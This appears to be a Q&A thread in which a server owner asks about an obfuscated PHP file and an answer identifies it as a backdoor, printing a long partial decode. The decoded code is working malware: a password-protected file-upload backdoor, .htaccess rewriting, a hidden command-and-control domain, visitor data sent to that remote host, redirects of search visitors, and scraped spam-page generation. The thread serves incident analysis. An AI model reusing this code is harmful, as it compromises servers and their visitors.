# found a suspicious PHP file, with encrypted code, can some one infer this for me?

Tags: php, security

Here is the pastebin link of the decrypted PHP code: http://pastebin.com/7HU17uqA, this file has been eating all the CPU cycles on one of my VPS.

Comment: Maybe you will tell us what this file is doing?

Comment: @Norbert: That is his question, quite legit since he suspects it to be a trojan. Maybe better suited to security.stackexchange.com, but I'm not really convinced about that.

Comment: oh crap!!! instead of moving to proper forum it has been closed

Comment: @Kumar See [here](http://perfect-co.de/2011/12/worst-trojan-ever/) what the script does.

Comment: lol,  base64 is not a method of encryption

Comment: @Rook, oh thanks for waking me up

Comment: @LinusKleen, one question though, how did it reach there? I just found another instance of same script but with different name.

Comment: It has probably been uploaded by exploiting an RFI weakness in a third-party application running on your server (an outdated Joomla, Typo3 or the likes). Or your FTP password is just not strong enough?

Answer (score 1):

This is a backdoor script that enables an attacker to upload files to your server.  I'll edit my answer with more info as I continue to reverse-engineer the encoding.

There's enough bad stuff here to know it's a backdoor.

It's not encrypted - it's encoded using base 64.  I simply changed the file around to echo (using search/replace in my editor) the results of both the GLOBALS['*455396494*'] array, and the function _630330270.  I renamed them to keywords and decrypto in my file.  Here's an example of what I mean.

```
<?= $GLOBALS['keywords'][0]; ?>(round(0));

if (isset($_GET[<?= decrypto( 0 ); ?>]))
{ 
if( !( <?= $GLOBALS['keywords'][1]; ?>("/^([a-z0-9\-\.\)\(\&\=]*)$/i", $_GET[<?= decrypto( 1 ); ?>])))
{
die;
```

---

here is a partial decode of the script

```
error_reporting(round(0));



if (isset($_GET[q]))

{ 

if( !( preg_match("/^([a-z0-9\-\.\)\(\&\=]*)$/i", $_GET[q])))

{

die;


}

}



if (extension_loaded(curl) && function_exists(curl_init) && function_exists(curl_exec)) {

    function l__0($_0) {

        $_1 = curl_init; ?>();


        curl_setopt; ?>($_1, 10002, $_0);


        curl_setopt; ?>($_1, 42, round(0));


        curl_setopt; ?>($_1, 19913, round(0+0.2+0.2+0.2+0.2+0.2));


        curl_setopt; ?>($_1, 52, round(0+0.5+0.5));


        curl_setopt; ?>($_1, 13, round(0+10+10));


        curl_setopt; ?>($_1, 3, round(0+40+40));


        curl_setopt; ?>($_1, 10018, Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 2.0.50727; InfoPath.1));


        $_2 = curl_exec; ?>($_1);


        $_3 = curl_getinfo; ?>($_1, 2097154);


        if ($_3 >= round(0+400))

            $_2 = false;


        curl_close; ?>($_1);


        return $_2;


    }

}

else if(function_exists; ?>( file_get_contents)) {


    function l__0($_0) {

        return file_get_contents; ?>($_0);


    }

}

else

    die( not work);






$_4 = preg_replace; ?>( /^www\./,  , $_SERVER[ HTTP_HOST]);









@mkdir; ?>( .log/);


@chmod; ?>( .log/,round(0+255.5+255.5));


@mkdir; ?>( .log/.$_4);


@chmod; ?>( .log/.$_4,round(0+102.2+102.2+102.2+102.2+102.2));







$_5 =  .log/.$_4. /xml.cgi;


if (@fopen; ?>($_5,  r)) {} else {

$_6 = fopen; ?>( .log/.$_4. /xml.cgi, w+);


fwrite; ?>($_6,  bXlkaWFyeXVzYS5uZXQ=);


fclose; ?>($_6);


}




if ( $_GET[ q] ==  alcobro ) {



$_5 =  .htaccess;


if (file_exists; ?>($_5)) {

     $_7 =  disable;


} else      {

$_8 = "<IfModule mod_rewrite.c>

RewriteEngine On

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*)$ ".$_SERVER[ SCRIPT_NAME]."?q=$1 [L]

</IfModule>";


$_9 =

 fopen; ?>( .htaccess, w+);


fwrite; ?>($_9,$_8);


fclose; ?>($_9);


$_7 =  enable;


     }







     $_10 =  base64_decode; ?>(file_get_contents; ?>( .log/.$_4. /xml.cgi));


     $_11 =  http://.$_10. /other/logdomain.php?q=.$_SERVER[ HTTP_HOST];


     $_12 = l__0($_11);


     echo $_12.$_7;


 die;






}





$_13 = $_POST[ name];


if (md5; ?>($_13) ==  42a3f0678d1bbb517272142f5b3df3cd) {




if ($_GET[ dom100500] !=  ) {

    $_14 = fopen; ?>( .log/.$_4. /xml.cgi, w+);


    fwrite; ?>($_14,$_GET[ dom100500]);


    fclose; ?>($_14);


    echo  100500ok;


    die;


}






if ($_GET[ up100500] !=  ) {

    $_15 =  ;


    $_15 = $_15 . basename; ?>( $_FILES[ uploaded][ name]) ;


    $_16=round(0+0.333333333333+0.333333333333+0.333333333333);


    if(move_uploaded_file; ?>($_FILES[ uploaded][ tmp_name], $_15)) {

        echo  up100500;


    }

    echo  <form enctype="multipart/form-data" method="POST"><input name="uploaded" type="file"><input type="submit" value="U"></form>;


    die;


}

}






if ( strpos; ?>( $_SERVER[ HTTP_REFERER],  site% ) > round(0) ) {} else {

if ( strpos; ?>( $_SERVER[ HTTP_REFERER],  google. ) > round(0) ) { 





    $_10 =  base64_decode; ?>(file_get_contents; ?>( .log/.$_4. /xml.cgi));


    $_17 = str_replace; ?> ( -,   , $_GET[ q]);


    $_18 =  http://.$_10. /out/stat.cgi?parameter=.rawurlencode; ?>(strtolower; ?>($_4.$_SERVER[ SCRIPT_NAME]. :.$_10)). &ip=.rawurlencode; ?>($_SERVER[ REMOTE_ADDR]). &ref=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_REFERER])). &useragent=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_USER_AGENT])). &domain=.rawurlencode; ?>(strtolower; ?>($_SERVER[ HTTP_HOST])). &visit=1&keyword=.rawurlencode; ?>($_17). &sheme=22;


    $_19 =  ;


    $_19 = l__0($_18);


    if (preg_match; ?>( |http://|iU, $_19 )) 

    {

            echo  <script>var url = ".$_19. "; if (window!=top) {top.location.href = url;} else { document.location= url;}</script>;


            die;


    } 





    }

}












function l__1($_20) {

$_4 = preg_replace; ?>( /^www\./,  , $_SERVER[ HTTP_HOST]);



    $_21 = isset($_GET[ q]) ? str_replace; ?>( /,  , urldecode; ?>($_GET[ q])) : FALSE;


    $_22 = str_replace; ?>( -, +,$_21);


    $_22 = str_replace; ?>( _, +,$_21);


    $_23 =  http://www.google.com/search?hl=en&as_q=.$_22. &num=100&as_qdr=all;


    $_24 = l__0($_23);


    preg_match_all; ?>( #<div class="s">(.*)<br>#U,$_24,$_25);


    $_26=array();


    for ($_27=round(0);
$_27<count; ?>($_25[round(0+0.2+0.2+0.2+0.2+0.2)]);
$_27++) {

        $_28=trim; ?>($_25[round(0+0.5+0.5)][$_27]);


        $_28=strip_tags; ?>($_28, <em>);


        $_28=str_replace; ?>( em>, b>,$_28);


        $_28=str_replace; ?>( ..., . ,$_28);


        $_28=str_replace; ?>( &amp;#39;,  ',$_28);


        $_28=str_replace; ?>( &#39;,  ',$_28);


        $_28=str_replace; ?>( #039;,  ',$_28);


        $_28=str_replace; ?>( &amp;quot;,  ,$_28);


        $_28=str_replace; ?>( middot;,  ,$_28);


        $_28=str_replace; ?>( quot;,  ,$_28);


        $_28=str_replace; ?>( amp;,  ,$_28);


        $_28=str_replace; ?>( nbsp;,  ,$_28);


        $_28=str_replace; ?>( —,   ,$_28);


        $_28=strip_tags; ?>($_28);


        array_push; ?>($_26,$_28);


    }

    for ($_27=round(0);
$_27<round(0+25+25);
$_27++) {

        $_29.=$_26[$_27];


    }







    Class l__2

    {

        var $_30 = array();




        function l__2($_31)

        {

            $_31 = strtolower; ?>($_31);


            $_31 = str_replace; ?>(array ( ? ,  ! ),  ., $_31);


            $_31 = str_replace; ?>(array (  -,  - ,     ,  
,  
,  |,   &,  \,  /,    :,   ;,  ©,  ·),   , $_31);


            $_31 = str_replace; ?>(array ( ),  (,  ],  [,  —,  ',  ",  *,  •,  ~,  {,  }),  , $_31);


            $_31 = str_replace(  ,,  ,, $_31);


            $_31 = preg_replace( ~(\s+\d{1,2}\s+)|(\w*\.\w+)~,   , $_31);


            $_31 = preg_replace( ~\s+~,   , $_31);




            $_32 = explode( . , $_31);


            $_33 = count($_32);


            for ($_34=round(0);
 $_34<$_33;
 ++$_34)

            {

                    $_32[$_34] = explode(  , $_32[$_34]);


                    $_35 = count($_32[$_34]) - round(0+0.5+0.5);


                    for ($_36=round(0);
 $_36 < $_35;
 ++$_36)

                    {

                        $_37 = $_32[$_34][$_36];


                        $this->_30[$_37][] = $_32[$_34][$_36+round(0+0.25+0.25+0.25+0.25)];


                    }

            }



            $_38 = array_keys($this->_30);


            foreach ($_38 as $_21)

            {

                    $this->_30[$_21] = array_unique($this->_30[$_21]);


            }

        }



        function l__3($_39)

        {

            $_40 = round(0);


            for ($_34=round(0);
 $_40 < $_39;
 ++$_34)

            {

                    $_41 = array_rand($this->_30);


                    $_42  = mt_rand(round(0+5), round(0+3+3+3+3));


                    for ($_36=round(0);
 $_36<$_42;
 ++$_36)

                    {   

                    $_43[$_34][$_36] = $_41;


                        ++$_40;


                        $_44 = $this->_30[$_41][mt_rand(round(0), count($this->_30[$_41]) - round(0+0.25+0.25+0.25+0.25))];


                        if ($_44 ==  ) $_44 = array_rand($this->_30);


                        $_41 = $_44;


                        if ($_41 ==  ) break round(0+2);


                    }

            }



            foreach ($_43 as $_45)

            {

                    $_46=count($_45);


                    if ($_46<=round(0+1+1)) continue;




                    if (strlen($_45[$_46-round(0+0.333333333333+0.333333333333+0.333333333333)]) < round(0+1+1+1+1)) unset($_45[$_46-round(0+0.5+0.5)]);




                    $_45[$_46-round(0+1+1)] = rtrim($_45[$_46-round(0+0.5+0.5+0.5+0.5)],  ,:;);


                    $_45[$_46-round(0+1)] = rtrim($_45[$_46-round(0+0.5+0.5)],  ,:;);


                    $_47 .= ucfirst(implode(  , $_45)). . ;


            }



            $_47 = str_replace(  .,  ., $_47);




            return $_47;


        }



    }



    $_31 = $_29;


    $_48 = new l__2($_31);


    $_49 = $_48->l__3(round(0+466.666666667+466.666666667+466.666666667));


    $_49 = preg_replace( /[^a-zA-Z\., -]+?/,  , $_49);








    $_50 = isset($_GET[ q]) ? str_replace( /,  , urldecode($_GET[ q])) : FALSE;


    $_50=str_replace( -,  ,$_50);


    $_50=str_replace( _,  ,$_50);







$_51 = str_replace (  ,  +, $_50);


if($_GET[ page] !=  1) { $_52 =  &start=.($_GET[ page]-round(0+0.25+0.25+0.25+0.25))*round(0+7+7+7);
 }

$_53 = l__0( http://images.google.com/images?q=.$_51. &lr=lang_en.$_52);


preg_match_all( /href="?\/imgres\?imgurl=([^\&]+)/, $_53, $_54);


$_55 = array();


for ($_36 = round(0);
 $_36 < count($_54[round(0+0.333333333333+0.333333333333+0.333333333333)]);
 $_36++) {

    $_56 = array( right,  left,  center);


    array_push($_55,  <img src=" . $_54[round(0+0.5+0.5)][$_36] .  " alt=".ucwords($_51). " align=".$_56[array_rand($_56)]. ">);


}

shuffle($_55);










if (strstr($_SERVER[ REQUEST_URI],  .php)) {

$_57 =  http://.$_SERVER[ HTTP_HOST].$_SERVER[ SCRIPT_NAME]. ?q=;


} else {

$_57 =  http://.$_SERVER[ HTTP_HOST].preg_replace( /[^\/]*?$/,  , $_SERVER[ SCRIPT_NAME]);


}




    $_58 = round(0+10+10+10);


    $_59 = glob(  .log/.$_4. /*.html );


    array_multisort( array_map( filectime, $_59), 3, $_59 );


    $_60 = round(0+1);


    $_61 =  ;


    foreach ( $_59 as $_62 )

    {

        if ( $_60 > $_58 ) break;


        preg_match_all(  #^\.log/.$_4."/(.*)\.html$#i", $_62, $_63 );


        $_61 .=  <a href=".$_57.$_63[round(0+0.25+0.25+0.25+0.25)][round(0)]. " title=".str_replace(  _,   , str_replace(  -,   , $_63[round(0+0.5+0.5)][round(0)])). ">.str_replace(  _,   , str_replace(  -,   , $_63[round(0+0.5+0.5)][round(0)])). </a>, ;




        $_60++;


    }




    $_64 = l__0( http://clients1.google.com/complete/search?hl=en&ds=i&q= . str_replace(  ,  %20, $_50));


    preg_match_all( |\["([^"]+)",|si, $_64, $_65, 1);


    $_66 = round(0);


    array_shift($_65[round(0+1)]);


    foreach ($_65[round(0+0.25+0.25+0.25+0.25)] as $_67) {

        $_68 .=  <a href='.$_57.str_replace(  ,  -, $_67). ' title='.$_67. '> . $_67 .  </a>, ;


        if ($_66++ > round(0+5.5+5.5)) break;


    }





    $_69 = $_57.$_GET[ q];


    $_70 =  <a href=".$_69. &page=2" title=".ucwords($_50). ">.ucwords($_50).  - Page 2</a> | <a href=".$_69. &page=3" title=".ucwords($_50). ">.ucwords($_50).  - Page 3</a> | <a href=".$_69. &page=4" title=".ucwords($_50). ">.ucwords($_50).  - Page 4</a> | <a href=".$_69. &page=5" title=".ucwords($_50). ">.ucwords($_50).  - Page 5</a> | <a href=".$_69. &page=6" title=".ucwords($_50). ">.ucwords($_50).  - Page 6</a> | <a href=".$_69. &page=7" title=".ucwords($_50). ">.ucwords($_50).  - Page 7</a>;













$_71 = explode (  ., $_49 );


$_2 = array_merge($_71, $_55);


shuffle($_2);




foreach ($_2 as $_72) {

$_73 .= $_72;


}






$_74 =  .log/.$_4. /don.txt;





if ( !file_exists( $_74 ) ) {

    $_75 = file_get_contents(  http://.$_SERVER[ HTTP_HOST] );


    $_75 = preg_replace(  /<meta(.*)name="description"(.*)>/i,  , $_75 );



    $_76 = preg_match_all(  /<([a-zA-z]+)>(.*)<\/([a-zA-Z]+)>/imsU, $_75, $_77 );


    $_78 = round(0);


    $_79 = round(0);




    for ( $_36 = round(0);
 $_36 < $_76;
 $_36++ ) {

        if ( (preg_match( /\<script/imsU, $_77[round(0)][$_36]) == round(0)) AND (strlen($_77[round(0)][$_36]) > $_78) ) {

            $_78 = strlen($_77[round(0)][$_36]);


            $_79 = $_36;


        }

    }



    $_75 = str_replace( $_77[round(0)][$_79], $_77[round(0)][$_79]. <REPLACEME>, $_75 );





    $_80 = fopen( $_74,  w );


    fputs($_80, $_75);


    fclose($_80);




}




$_81 =  <h1>.strtoupper($_50).$_82. </h1>
.$_68.$_61. 
.$_73. 
<p>.$_70. </p>;


    return $_81;


}






function l__4($_83) {

$_4 = preg_replace( /^www\./,  , $_SERVER[ HTTP_HOST]);


    $_84= .log/.$_4. /.$_83 . .html.$_GET[ page];


    if(@file_exists($_84))return@file_get_contents($_84);


    $_20=str_replace( -,  ,$_83);


    $_20=str_replace( +,  ,$_83);


    $_85=l__1($_20);


    $_86=@fopen($_84, w);


    @fwrite($_86,$_85);


    @fclose($_86);


    return $_85;


    $_87=file_get_contents($_84);

}






        if($_GET[ q]!=  )

        {

$_74 =  .log/.$_4. /don.txt;


if  (filesize($_74) < round(0+200+200+200+200) ) {

$_75 =  <head>
<title>title</title>
</head>
<body>
<REPLACEME>
</body>
</html>;


} else {

$_75 = file_get_contents( $_74 );


}



$_88=basename($_GET[ q]);


$_50 = $_GET[ q];


$_50=str_replace( -,  ,$_50);


$_50=str_replace( .html, ,$_50);






$_75 = preg_replace(  /<title>(.*)<\/title>/imsU,  <title>.ucwords($_50). </title>, $_75 );


$_75 = str_replace(  <REPLACEME>, l__4($_88), $_75 );


print $_75;


exit;


                    }
```